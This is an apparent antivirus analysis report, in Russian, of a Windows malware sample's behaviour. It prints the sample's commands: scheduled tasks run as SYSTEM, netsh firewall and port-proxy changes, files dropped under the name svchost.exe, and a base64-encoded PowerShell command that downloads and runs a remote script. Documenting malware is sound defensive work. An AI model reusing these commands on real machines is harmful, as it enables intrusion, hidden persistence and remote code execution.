Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\voaotue
- <SYSTEM32>\tasks\rcirrk
Вредоносные функции
Запускает на исполнение
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 65529 DNSd
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\svchost.exe
- %WINDIR%\temp\eb.txt
- %WINDIR%\voaotue.exe
Сетевая активность
UDP
- DNS ASK t.##ynx.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c echo sYXABXnv >> %WINDIR%\temp\svchost.exe&echo "*" >%WINDIR%\temp\eb.txt&netsh firewall add portopening tcp 65529 DNSd&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c echo sYXABXnv >> %WINDIR%\temp\svchost.exe&echo "*" >%WINDIR%\temp\eb.txt&netsh firewall add portopening tcp 65529 DNSd&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1...
- '<SYSTEM32>\netsh.exe' interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAH...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn voAoTUE /tr "%WINDIR%\voAoTUE.exe" /F
- '<SYSTEM32>\schtasks.exe' /run /TN voAoTUE
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\rcIRRK" /tr "%WINDIR%\rcIRRK.exe" /F
- '<SYSTEM32>\schtasks.exe' /run /TN rcIRRK
